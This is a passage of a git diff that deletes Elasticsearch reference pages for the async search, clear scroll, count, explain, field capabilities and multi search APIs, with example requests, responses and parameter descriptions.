-include::eql/delete-async-eql-search-api.asciidoc[] - -include::search/count.asciidoc[] - -include::search/validate.asciidoc[] - -include::search/explain.asciidoc[] - -include::search/profile.asciidoc[] - -include::search/field-caps.asciidoc[] - -include::search/rank-eval.asciidoc[] diff --git a/docs/reference/search/async-search.asciidoc b/docs/reference/search/async-search.asciidoc deleted file mode 100644 index 72241e23878..00000000000 --- a/docs/reference/search/async-search.asciidoc +++ /dev/null @@ -1,236 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[async-search]] -=== Async search - -The async search API let you asynchronously execute a -search request, monitor its progress, and retrieve partial results -as they become available. - -[[submit-async-search]] -==== Submit async search API - -Executes a search request asynchronously. It accepts the same -parameters and request body as the <>. - -[source,console,id=submit-async-search-date-histogram-example] --------------------------------------------------- -POST /sales*/_async_search?size=0 -{ - "sort": [ - { "date": { "order": "asc" } } - ], - "aggs": { - "sale_date": { - "date_histogram": { - "field": "date", - "calendar_interval": "1d" - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[s/size=0/size=0&wait_for_completion_timeout=10s&keep_on_completion=true/] - -The response contains an identifier of the search being executed. -You can use this ID to later retrieve the search's final results. -The currently available search -results are returned as part of the <> object. 
- -[source,console-result] --------------------------------------------------- -{ - "id" : "FmRldE8zREVEUzA2ZVpUeGs2ejJFUFEaMkZ5QTVrSTZSaVN3WlNFVmtlWHJsdzoxMDc=", <1> - "is_partial" : true, <2> - "is_running" : true, <3> - "start_time_in_millis" : 1583945890986, - "expiration_time_in_millis" : 1584377890986, - "response" : { - "took" : 1122, - "timed_out" : false, - "num_reduce_phases" : 0, - "_shards" : { - "total" : 562, <4> - "successful" : 3, <5> - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value" : 157483, <6> - "relation" : "gte" - }, - "max_score" : null, - "hits" : [ ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/FmRldE8zREVEUzA2ZVpUeGs2ejJFUFEaMkZ5QTVrSTZSaVN3WlNFVmtlWHJsdzoxMDc=/$body.id/] -// TESTRESPONSE[s/"is_partial" : true/"is_partial": $body.is_partial/] -// TESTRESPONSE[s/"is_running" : true/"is_running": $body.is_running/] -// TESTRESPONSE[s/1583945890986/$body.start_time_in_millis/] -// TESTRESPONSE[s/1584377890986/$body.expiration_time_in_millis/] -// TESTRESPONSE[s/"took" : 1122/"took": $body.response.took/] -// TESTRESPONSE[s/"num_reduce_phases" : 0,//] -// TESTRESPONSE[s/"total" : 562/"total": $body.response._shards.total/] -// TESTRESPONSE[s/"successful" : 3/"successful": $body.response._shards.successful/] -// TESTRESPONSE[s/"value" : 157483/"value": $body.response.hits.total.value/] -// TESTRESPONSE[s/"relation" : "gte"/"relation": $body.response.hits.total.relation/] -// TESTRESPONSE[s/"hits" : \[ \]\n\s\s\s\s\}/"hits" : \[\]},"aggregations": $body.response.aggregations/] - -<1> Identifier of the async search that can be used to monitor its progress, -retrieve its results, and/or delete it -<2> When the query is no longer running, indicates whether the search failed -or was successfully completed on all shards. While the query is being -executed, `is_partial` is always set to `true` -<3> Whether the search is still being executed or it has completed -<4> How many shards the search will be executed on, overall -<5> How many shards have successfully completed the search -<6> How many documents are currently matching the query, which belong to the -shards that have already completed the search - -NOTE: Although the query is no longer running, hence `is_running` is set to -`false`, results may be partial. That happens in case the search failed after -some shards returned their results, or when the node that is coordinating the - async search dies. - -It is possible to block and wait until the search is completed up to a certain -timeout by providing the `wait_for_completion_timeout` parameter, which -defaults to `1` second. When the async search completes within such timeout, -the response won't include the ID as the results are not stored in the cluster. -The `keep_on_completion` parameter, which defaults to `false`, can be set to -`true` to request that results are stored for later retrieval also when the -search completes within the `wait_for_completion_timeout`. - -You can also specify how long the async search needs to be -available through the `keep_alive` parameter, which defaults to `5d` (five days). -Ongoing async searches and any saved search results are deleted after this -period. - -NOTE: When the primary sort of the results is an indexed field, shards get -sorted based on minimum and maximum value that they hold for that field, -hence partial results become available following the sort criteria that -was requested. 
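For example, the following request is a sketch that combines the parameters
described above, assuming the same `sales*` indices as the earlier example. It
blocks for up to two seconds, asks for the results to be stored even if the
search finishes within that window, and keeps them available for three days:

[source,console]
--------------------------------------------------
POST /sales*/_async_search?wait_for_completion_timeout=2s&keep_on_completion=true&keep_alive=3d
{
  "aggs": {
    "sale_date": {
      "date_histogram": {
        "field": "date",
        "calendar_interval": "1d"
      }
    }
  }
}
--------------------------------------------------
// TEST[skip:illustrative sketch of the parameters described above]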
- -The submit async search API supports the same <> -as the search API, though some have different default values: - -* `batched_reduce_size` defaults to `5`: this affects how often partial results -become available, which happens whenever shard results are reduced. A partial -reduction is performed every time the coordinating node has received a certain -number of new shard responses (`5` by default). -* `request_cache` defaults to `true` -* `pre_filter_shard_size` defaults to `1` and cannot be changed: this is to -enforce the execution of a pre-filter roundtrip to retrieve statistics from -each shard so that the ones that surely don't hold any document matching the -query get skipped. -* `ccs_minimize_roundtrips` defaults to `false`, which is also the only -supported value - -WARNING: Async search does not support <> -nor search requests that only include the <>. -{ccs} is supported only with <> -set to `false`. - -[[get-async-search]] -==== Get async search - -The get async search API retrieves the results of a previously submitted -async search request given its id. If the {es} {security-features} are enabled. -the access to the results of a specific async search is restricted to the user -that submitted it in the first place. - -[source,console,id=get-async-search-date-histogram-example] --------------------------------------------------- -GET /_async_search/FmRldE8zREVEUzA2ZVpUeGs2ejJFUFEaMkZ5QTVrSTZSaVN3WlNFVmtlWHJsdzoxMDc= --------------------------------------------------- -// TEST[continued s/FmRldE8zREVEUzA2ZVpUeGs2ejJFUFEaMkZ5QTVrSTZSaVN3WlNFVmtlWHJsdzoxMDc=/\${body.id}/] - -[source,console-result] --------------------------------------------------- -{ - "id" : "FmRldE8zREVEUzA2ZVpUeGs2ejJFUFEaMkZ5QTVrSTZSaVN3WlNFVmtlWHJsdzoxMDc=", - "is_partial" : true, <1> - "is_running" : true, <2> - "start_time_in_millis" : 1583945890986, - "expiration_time_in_millis" : 1584377890986, <3> - "response" : { - "took" : 12144, - "timed_out" : false, - "num_reduce_phases" : 46, <4> - "_shards" : { - "total" : 562, <5> - "successful" : 188, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value" : 456433, - "relation" : "eq" - }, - "max_score" : null, - "hits" : [ ] - }, - "aggregations" : { <6> - "sale_date" : { - "buckets" : [] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/FmRldE8zREVEUzA2ZVpUeGs2ejJFUFEaMkZ5QTVrSTZSaVN3WlNFVmtlWHJsdzoxMDc=/$body.id/] -// TESTRESPONSE[s/"is_partial" : true/"is_partial" : false/] -// TESTRESPONSE[s/"is_running" : true/"is_running" : false/] -// TESTRESPONSE[s/1583945890986/$body.start_time_in_millis/] -// TESTRESPONSE[s/1584377890986/$body.expiration_time_in_millis/] -// TESTRESPONSE[s/"took" : 12144/"took": $body.response.took/] -// TESTRESPONSE[s/"total" : 562/"total": $body.response._shards.total/] -// TESTRESPONSE[s/"successful" : 188/"successful": $body.response._shards.successful/] -// TESTRESPONSE[s/"value" : 456433/"value": $body.response.hits.total.value/] -// TESTRESPONSE[s/"buckets" : \[\]/"buckets": $body.response.aggregations.sale_date.buckets/] -// TESTRESPONSE[s/"num_reduce_phases" : 46,//] - -<1> When the query is no longer running, indicates whether the search failed -or was successfully completed on all shards. While the query is being -executed, `is_partial` is always set to `true` -<2> Whether the search is still being executed or it has completed -<3> When the async search will expire -<4> Indicates how many reductions of the results have been performed. 
If this -number increases compared to the last retrieved results, you can expect -additional results included in the search response -<5> Indicates how many shards have executed the query. Note that in order for -shard results to be included in the search response, they need to be reduced -first. -<6> Partial aggregations results, coming from the shards that have already -completed the execution of the query. - -The `wait_for_completion_timeout` parameter can also be provided when calling -the Get Async Search API, in order to wait for the search to be completed up -until the provided timeout. Final results will be returned if available before -the timeout expires, otherwise the currently available results will be -returned once the timeout expires. By default no timeout is set meaning that -the currently available results will be returned without any additional wait. - -The `keep_alive` parameter specifies how long the async search should be -available in the cluster. When not specified, the `keep_alive` set with the -corresponding submit async request will be used. Otherwise, it is possible to -override such value and extend the validity of the request. When this period -expires, the search, if still running, is cancelled. If the search is -completed, its saved results are deleted. - -[[delete-async-search]] -==== Delete async search - -You can use the delete async search API to manually delete an async search -by ID. If the search is still running, the search request will be cancelled. -Otherwise, the saved search results are deleted. - -[source,console,id=delete-async-search-date-histogram-example] --------------------------------------------------- -DELETE /_async_search/FmRldE8zREVEUzA2ZVpUeGs2ejJFUFEaMkZ5QTVrSTZSaVN3WlNFVmtlWHJsdzoxMDc= --------------------------------------------------- -// TEST[continued s/FmRldE8zREVEUzA2ZVpUeGs2ejJFUFEaMkZ5QTVrSTZSaVN3WlNFVmtlWHJsdzoxMDc=/\${body.id}/] diff --git a/docs/reference/search/clear-scroll-api.asciidoc b/docs/reference/search/clear-scroll-api.asciidoc deleted file mode 100644 index a005babfd1b..00000000000 --- a/docs/reference/search/clear-scroll-api.asciidoc +++ /dev/null @@ -1,86 +0,0 @@ -[[clear-scroll-api]] -=== Clear scroll API -++++ -Clear scroll -++++ - -Clears the search context and results for a -<>. - -//// -[source,console] --------------------------------------------------- -GET /_search?scroll=1m -{ - "size": 1, - "query": { - "match_all": {} - } -} --------------------------------------------------- -// TEST[setup:my_index] -//// - -[source,console] --------------------------------------------------- -DELETE /_search/scroll -{ - "scroll_id" : "DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==" -} --------------------------------------------------- -// TEST[continued] -// TEST[s/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==/$body._scroll_id/] - -[[clear-scroll-api-request]] -==== {api-request-title} - -`DELETE /_search/scroll/` -deprecated:[7.0.0] - -`DELETE /_search/scroll` - -[[clear-scroll-api-path-params]] -==== {api-path-parms-title} - -``:: -deprecated:[7.0.0] -(Optional, string) -Comma-separated list of scroll IDs to clear. To clear all scroll IDs, use `_all`. -+ -IMPORTANT: Scroll IDs can be long. We recommend only specifying -scroll IDs using the <>. - -[[clear-scroll-api-query-params]] -==== {api-query-parms-title} - -`scroll_id`:: -deprecated:[7.0.0] -(Optional, string) -Comma-separated list of scroll IDs to clear. To clear all scroll IDs, use `_all`. 
-+ -IMPORTANT: Scroll IDs can be long. We recommend only specifying -scroll IDs using the <>. - -[role="child_attributes"] -[[clear-scroll-api-request-body]] -==== {api-request-body-title} - -[[clear-scroll-api-scroll-id-param]] -`scroll_id`:: -(Required, string or array of strings) -Scroll IDs to clear. To clear all scroll IDs, use `_all`. - -[role="child_attributes"] -[[clear-scroll-api-response-body]] -==== {api-response-body-title} - -`succeeded`:: -(Boolean) -If `true`, the request succeeded. This does not indicate whether any scrolling -search requests were cleared. - -`num_freed`:: -(integer) -Number of scrolling search requests cleared. \ No newline at end of file diff --git a/docs/reference/search/count.asciidoc b/docs/reference/search/count.asciidoc deleted file mode 100644 index 07bb447c425..00000000000 --- a/docs/reference/search/count.asciidoc +++ /dev/null @@ -1,132 +0,0 @@ -[[search-count]] -=== Count API - -Gets the number of matches for a search query. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_count?q=user:kimchy --------------------------------------------------- -// TEST[setup:my_index] - -NOTE: The query being sent in the body must be nested in a `query` key, same as -the <> works. - - -[[search-count-api-request]] -==== {api-request-title} - -`GET //_count` - - -[[search-count-api-desc]] -==== {api-description-title} - -The count API allows you to execute a query and get the number of matches for -that query. The query can either -be provided using a simple query string as a parameter, or using the -<> defined within the request body. - -The count API supports <>. You can run a single -count API search across multiple data streams and indices. - -The operation is broadcast across all shards. For each shard id group, a replica -is chosen and executed against it. This means that replicas increase the -scalability of count. - - -[[search-count-api-path-params]] -==== {api-path-parms-title} - -``:: - -(Optional, string) -Comma-separated list of data streams, indices, and index aliases to search. -Wildcard (`*`) expressions are supported. -+ -To search all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -[[search-count-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyzer] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyze_wildcard] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=default_operator] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=df] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=ignore_throttled] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=lenient] - -`min_score`:: -(Optional, float) - Sets the minimum `_score` value that documents must have to be included in the - result. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-q] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=terminate_after] - - -[[search-count-request-body]] -==== {api-request-body-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=query] - - -[[search-count-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_doc/1?refresh -{ - "user.id": "kimchy" -} - -GET /my-index-000001/_count?q=user:kimchy - -GET /my-index-000001/_count -{ - "query" : { - "term" : { "user.id" : "kimchy" } - } -} --------------------------------------------------- - -Both examples above do the same: count the number of documents in -`my-index-000001` with a `user.id` of `kimchy`. The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "count": 1, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - } -} --------------------------------------------------- - -The query is optional, and when not provided, it will use `match_all` to -count all the docs. diff --git a/docs/reference/search/explain.asciidoc b/docs/reference/search/explain.asciidoc deleted file mode 100644 index 61ee2d7aa9a..00000000000 --- a/docs/reference/search/explain.asciidoc +++ /dev/null @@ -1,190 +0,0 @@ -[[search-explain]] -=== Explain API - -Returns information about why a specific document matches (or doesn't match) a -query. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_explain/0 -{ - "query" : { - "match" : { "message" : "elasticsearch" } - } -} --------------------------------------------------- -// TEST[setup:messages] - - -[[search-explain-api-request]] -==== {api-request-title} - -`GET //_explain/` - -`POST //_explain/` - -[[search-explain-api-desc]] -==== {api-description-title} - -The explain API computes a score explanation for a query and a specific -document. This can give useful feedback whether a document matches or -didn't match a specific query. - - -[[search-explain-api-path-params]] -==== {api-path-parms-title} - -``:: - (Required, integer) Defines the document ID. - -``:: -+ --- -(Required, string) -Index names used to limit the request. - -Only a single index name can be provided to this parameter. --- - - -[[search-explain-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyzer] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyze_wildcard] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=default_operator] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=df] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=lenient] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-q] - -`stored_fields`:: - (Optional, string) A comma-separated list of stored fields to return in the - response. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-routing] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_excludes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_includes] - - -[[search-explain-api-request-body]] -==== {api-request-body-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=query] - - -[[search-explain-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /my-index-000001/_explain/0 -{ - "query" : { - "match" : { "message" : "elasticsearch" } - } -} --------------------------------------------------- -// TEST[setup:messages] - - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "_index":"my-index-000001", - "_type":"_doc", - "_id":"0", - "matched":true, - "explanation":{ - "value":1.6943598, - "description":"weight(message:elasticsearch in 0) [PerFieldSimilarity], result of:", - "details":[ - { - "value":1.6943598, - "description":"score(freq=1.0), computed as boost * idf * tf from:", - "details":[ - { - "value":2.2, - "description":"boost", - "details":[] - }, - { - "value":1.3862944, - "description":"idf, computed as log(1 + (N - n + 0.5) / (n + 0.5)) from:", - "details":[ - { - "value":1, - "description":"n, number of documents containing term", - "details":[] - }, - { - "value":5, - "description":"N, total number of documents with field", - "details":[] - } - ] - }, - { - "value":0.5555556, - "description":"tf, computed as freq / (freq + k1 * (1 - b + b * dl / avgdl)) from:", - "details":[ - { - "value":1.0, - "description":"freq, occurrences of term within document", - "details":[] - }, - { - "value":1.2, - "description":"k1, term saturation parameter", - "details":[] - }, - { - "value":0.75, - "description":"b, length normalization parameter", - "details":[] - }, - { - "value":3.0, - "description":"dl, length of field", - "details":[] - }, - { - "value":5.4, - "description":"avgdl, average length of field", - "details":[] - } - ] - } - ] - } - ] - } -} --------------------------------------------------- - - -There is also a simpler way of specifying the query via the `q` parameter. The -specified `q` parameter value is then parsed as if the `query_string` query was -used. Example usage of the `q` parameter in the -explain API: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_explain/0?q=message:search --------------------------------------------------- -// TEST[setup:messages] - - -The API returns the same result as the previous request. diff --git a/docs/reference/search/field-caps.asciidoc b/docs/reference/search/field-caps.asciidoc deleted file mode 100644 index d0024c03a34..00000000000 --- a/docs/reference/search/field-caps.asciidoc +++ /dev/null @@ -1,266 +0,0 @@ -[[search-field-caps]] -=== Field capabilities API -++++ -Field capabilities -++++ - - -Allows you to retrieve the capabilities of fields among multiple indices. -For data streams, the API returns field capabilities among the stream's backing -indices. 
- -[source,console] --------------------------------------------------- -GET /_field_caps?fields=rating --------------------------------------------------- - - -[[search-field-caps-api-request]] -==== {api-request-title} - -`GET /_field_caps?fields=` - -`POST /_field_caps?fields=` - -`GET //_field_caps?fields=` - -`POST //_field_caps?fields=` - - -[[search-field-caps-api-desc]] -==== {api-description-title} - - -The field capabilities API returns the information about the capabilities of -fields among multiple indices. - - -[[search-field-caps-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[search-field-caps-api-query-params]] -==== {api-query-parms-title} - -`fields`:: -(Required, string) -Comma-separated list of fields to retrieve capabilities for. Wildcard (`*`) -expressions are supported. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ --- -Defaults to `open`. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`include_unmapped`:: - (Optional, Boolean) If `true`, unmapped fields are included in the response. - Defaults to `false`. - -[[search-field-caps-api-request-body]] -==== {api-request-body-title} - -`index_filter`:: -(Optional, <> Allows to filter indices if the provided -query rewrites to `match_none` on every shard. - -[[search-field-caps-api-response-body]] -==== {api-response-body-title} - - -The types used in the response describe _families_ of field types. -Normally a type family is the same as the field type declared in the mapping, -but to simplify matters certain field types that behave identically are -described using a type family. For example, `keyword`, `constant_keyword` and `wildcard` -field types are all described as the `keyword` type family. - - - -`searchable`:: - Whether this field is indexed for search on all indices. - -`aggregatable`:: - Whether this field can be aggregated on all indices. - -`indices`:: - The list of indices where this field has the same type family, or null if all indices - have the same type family for the field. - -`non_searchable_indices`:: - The list of indices where this field is not searchable, or null if all indices - have the same definition for the field. - -`non_aggregatable_indices`:: - The list of indices where this field is not aggregatable, or null if all - indices have the same definition for the field. - -`meta`:: - Merged metadata across all indices as a map of string keys to arrays of values. - A value length of 1 indicates that all indices had the same value for this key, - while a length of 2 or more indicates that not all indices had the same value - for this key. 
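To make the merging rule for `meta` concrete, the following fragment shows what
a merged entry might look like. The keys `unit` and `metric_type` are
hypothetical examples of field metadata, not values every cluster returns:

[source,js]
--------------------------------------------------
"meta": {
  "unit": [ "ms" ],                       <1>
  "metric_type": [ "gauge", "counter" ]   <2>
}
--------------------------------------------------
// NOTCONSOLE

<1> A single value: all indices declare the same `unit` for this field.
<2> Two values: at least two indices disagree on `metric_type`.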
- - -[[search-field-caps-api-example]] -==== {api-examples-title} - - -The request can be restricted to specific data streams and indices: - -[source,console] --------------------------------------------------- -GET my-index-000001/_field_caps?fields=rating --------------------------------------------------- -// TEST[setup:my_index] - - -The next example API call requests information about the `rating` and the -`title` fields: - -[source,console] --------------------------------------------------- -GET _field_caps?fields=rating,title --------------------------------------------------- - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "indices": [ "index1", "index2", "index3", "index4", "index5" ], - "fields": { - "rating": { <1> - "long": { - "searchable": true, - "aggregatable": false, - "indices": [ "index1", "index2" ], - "non_aggregatable_indices": [ "index1" ] <2> - }, - "keyword": { - "searchable": false, - "aggregatable": true, - "indices": [ "index3", "index4" ], - "non_searchable_indices": [ "index4" ] <3> - } - }, - "title": { <4> - "text": { - "searchable": true, - "aggregatable": false - - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:historically skipped] - -<1> The field `rating` is defined as a long in `index1` and `index2` -and as a `keyword` in `index3` and `index4`. -<2> The field `rating` is not aggregatable in `index1`. -<3> The field `rating` is not searchable in `index4`. -<4> The field `title` is defined as `text` in all indices. - - -By default unmapped fields are ignored. You can include them in the response by -adding a parameter called `include_unmapped` in the request: - -[source,console] --------------------------------------------------- -GET _field_caps?fields=rating,title&include_unmapped --------------------------------------------------- - -In which case the response will contain an entry for each field that is present -in some indices but not all: - -[source,console-result] --------------------------------------------------- -{ - "indices": [ "index1", "index2", "index3" ], - "fields": { - "rating": { - "long": { - "searchable": true, - "aggregatable": false, - "indices": [ "index1", "index2" ], - "non_aggregatable_indices": [ "index1" ] - }, - "keyword": { - "searchable": false, - "aggregatable": true, - "indices": [ "index3", "index4" ], - "non_searchable_indices": [ "index4" ] - }, - "unmapped": { <1> - "indices": [ "index5" ], - "searchable": false, - "aggregatable": false - } - }, - "title": { - "text": { - "indices": [ "index1", "index2", "index3", "index4" ], - "searchable": true, - "aggregatable": false - }, - "unmapped": { <2> - "indices": [ "index5" ], - "searchable": false, - "aggregatable": false - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:historically skipped] - -<1> The `rating` field is unmapped` in `index5`. -<2> The `title` field is unmapped` in `index5`. - -It is also possible to filter indices with a query: - -[source,console] --------------------------------------------------- -POST my-index-*/_field_caps?fields=rating -{ - "index_filter": { - "range": { - "@timestamp": { - "gte": "2018" - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - - -In which case indices that rewrite the provided filter to `match_none` on every shard -will be filtered from the response. 
- --- -[IMPORTANT] -==== -The filtering is done on a best-effort basis, it uses index statistics and mappings -to rewrite queries to `match_none` instead of fully executing the request. -For instance a `range` query over a `date` field can rewrite to `match_none` -if all documents within a shard (including deleted documents) are outside -of the provided range. -However, not all queries can rewrite to `match_none` so this API may return -an index even if the provided filter matches no document. -==== --- diff --git a/docs/reference/search/multi-search.asciidoc b/docs/reference/search/multi-search.asciidoc deleted file mode 100644 index 798f1dc30fc..00000000000 --- a/docs/reference/search/multi-search.asciidoc +++ /dev/null @@ -1,412 +0,0 @@ -[[search-multi-search]] -=== Multi search API -++++ -Multi search -++++ - -Executes several searches with a single API request. - -[source,console] --------------------------------------------------- -GET my-index-000001/_msearch -{ } -{"query" : {"match" : { "message": "this is a test"}}} -{"index": "my-index-000002"} -{"query" : {"match_all" : {}}} --------------------------------------------------- -// TEST[setup:my_index] - -[[search-multi-search-api-request]] -==== {api-request-title} - -`GET //_msearch` - - -[[search-multi-search-api-desc]] -==== {api-description-title} - -The multi search API executes several searches from a single API request. -The format of the request is similar to the bulk API format and makes use -of the newline delimited JSON (NDJSON) format. - -The structure is as follows: - -[source,js] --------------------------------------------------- -header\n -body\n -header\n -body\n --------------------------------------------------- -// NOTCONSOLE - -This structure is specifically optimized to reduce parsing if a specific search -ends up redirected to another node. - -[IMPORTANT] -==== -The final line of data must end with a newline character `\n`. Each newline -character may be preceded by a carriage return `\r`. When sending requests to -this endpoint the `Content-Type` header should be set to `application/x-ndjson`. -==== - -[[search-multi-search-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases to search. -+ -This list acts as a fallback if a search in the request body does not specify an -`index` target. -+ -Wildcard (`*`) expressions are supported. To search all data streams and indices -in a cluster, omit this parameter or use `_all` or `*`. - -[[search-multi-search-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] - -`ccs_minimize_roundtrips`:: -(Optional, Boolean) -If `true`, network roundtrips between the coordinating node and remote clusters -are minimized for {ccs} requests. Defaults to `true`. See -<>. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -`ignore_throttled`:: -(Optional, Boolean) -If `true`, concrete, expanded or aliased indices are ignored when frozen. -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`max_concurrent_searches`:: -(Optional, integer) -Maximum number of concurrent searches the multi search API can execute. Defaults -to +max(1, (# of <> * min(<>, 10)))+. - -`max_concurrent_shard_requests`:: -+ --- -(Optional, integer) -Maximum number of concurrent shard requests that each sub-search request -executes per node. 
Defaults to `5`.

You can use this parameter to prevent a request from overloading a cluster. For
example, a default request hits all data streams and indices in a cluster. This
could cause shard request rejections if the number of shards per node is high.

In certain scenarios, parallelism isn't achieved through concurrent requests. In
those cases, a low value in this parameter could result in poor performance.
For example, in an environment where a very low number of concurrent search
requests are expected, a higher value in this parameter may improve performance.
--

`pre_filter_shard_size`::
(Optional, integer)
Defines a threshold that enforces a pre-filter roundtrip to prefilter search
shards based on query rewriting if the number of shards the search request
expands to exceeds the threshold. This filter roundtrip can significantly limit
the number of shards if, for instance, a shard cannot match any documents based
on its rewrite method, i.e. if date filters are mandatory to match but the
shard bounds and the query are disjoint.
When unspecified, the pre-filter phase is executed if any of these
conditions is met:
  - The request targets more than `128` shards.
  - The request targets one or more read-only indices.
  - The primary sort of the query targets an indexed field.

`rest_total_hits_as_int`::
(Optional, Boolean)
If `true`, `hits.total` is returned as an integer in the
response. Defaults to `false`, which returns an object.

`routing`::
(Optional, string)
Custom <> used to route search operations
to a specific shard.

`search_type`::
+
--
(Optional, string)
Indicates whether global term and document frequencies should be used when
scoring returned documents.

Options are:

`query_then_fetch`::
(default)
Documents are scored using local term and document frequencies for the shard.
This is usually faster but less accurate.

`dfs_query_then_fetch`::
Documents are scored using global term and document frequencies across all
shards. This is usually slower but more accurate.
--

`typed_keys`::
(Optional, Boolean)
Specifies whether aggregation and suggester names should be prefixed by their
respective types in the response.

[[search-multi-search-api-request-body]]
==== {api-request-body-title}

The request body contains a newline-delimited list of search `<header>` and
search `<body>` objects.

`<header>
`:: -+ --- -(Required, object) -Contains parameters used to limit or change the subsequent search body request. - -This object is required for each search body but can be empty (`{}`) or a blank -line. --- - -`allow_no_indices`::: -(Optional, Boolean) -If `true`, the request does *not* return an error if a wildcard expression or -`_all` value retrieves only missing or closed indices. -+ -This parameter also applies to <> that point to a -missing or closed index. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -`ignore_unavailable`::: -(Optional, Boolean) If `true`, documents from missing or closed indices are not -included in the response. Defaults to `false`. - -`index`::: -(Optional, string or array of strings) -Data streams, indices, and index aliases to search. Wildcard (`*`) expressions -are supported. You can specify multiple targets as an array. -+ -If this parameter is not specified, the `` request path parameter -is used as a fallback. - -`preference`::: -(Optional, string) -Node or shard used to perform the search. Random by default. - -`request_cache`::: -(Optional, Boolean) -If `true`, the request cache can be used for this search. Defaults to -index-level settings. See <>. - -`routing`::: -(Optional, string) -Custom <> used to route search operations -to a specific shard. - -`search_type`::: -+ --- -(Optional, string) -Indicates whether global term and document frequencies should be used when -scoring returned documents. - -Options are: - -`query_then_fetch`:: -(default) -Documents are scored using local term and document frequencies for the shard. -This is usually faster but less accurate. - -`dfs_query_then_fetch`:: -Documents are scored using global term and document frequencies across all -shards. This is usually slower but more accurate. --- - -``:: -(Optional, object) -Contains parameters for a search request: - -`aggregations`::: -(Optional, <>) -Aggregations you wish to run during the search. See <>. - -`query`::: -(Optional, <>) Query you wish to run during the -search. Hits matching this query are returned in the response. - -`from`::: -(Optional, integer) -Starting offset for returned hits. Defaults to `0`. - -`size`::: -(Optional, integer) -Number of hits to return. Defaults to `10`. - -[[search-multi-search-api-response-body]] -==== {api-response-body-title} - -`responses`:: - (array) Includes the search response and status code for each search request - matching its order in the original multi search request. If there was a - complete failure for a specific search request, an object with `error` message - and corresponding status code will be returned in place of the actual search - response. - - -[[search-multi-search-api-example]] -==== {api-examples-title} - -The header part includes which data streams, indices, and index aliases to -search. The header also indicates the `search_type`, -`preference`, and `routing`. The body includes the typical search body request -(including the `query`, `aggregations`, `from`, `size`, and so on). 
